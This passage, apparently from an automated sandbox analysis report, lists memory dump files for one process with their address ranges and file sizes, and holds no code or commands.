                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/4828-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4828-45-0x00007FFAF7490000-0x00007FFAF754E000-memory.dmp

                                                                                                                Filesize

                                                                                                                760KB

                                                                                                              • memory/4828-43-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4828-36-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4828-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4828-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4828-44-0x00007FFAF8010000-0x00007FFAF8205000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4828-46-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB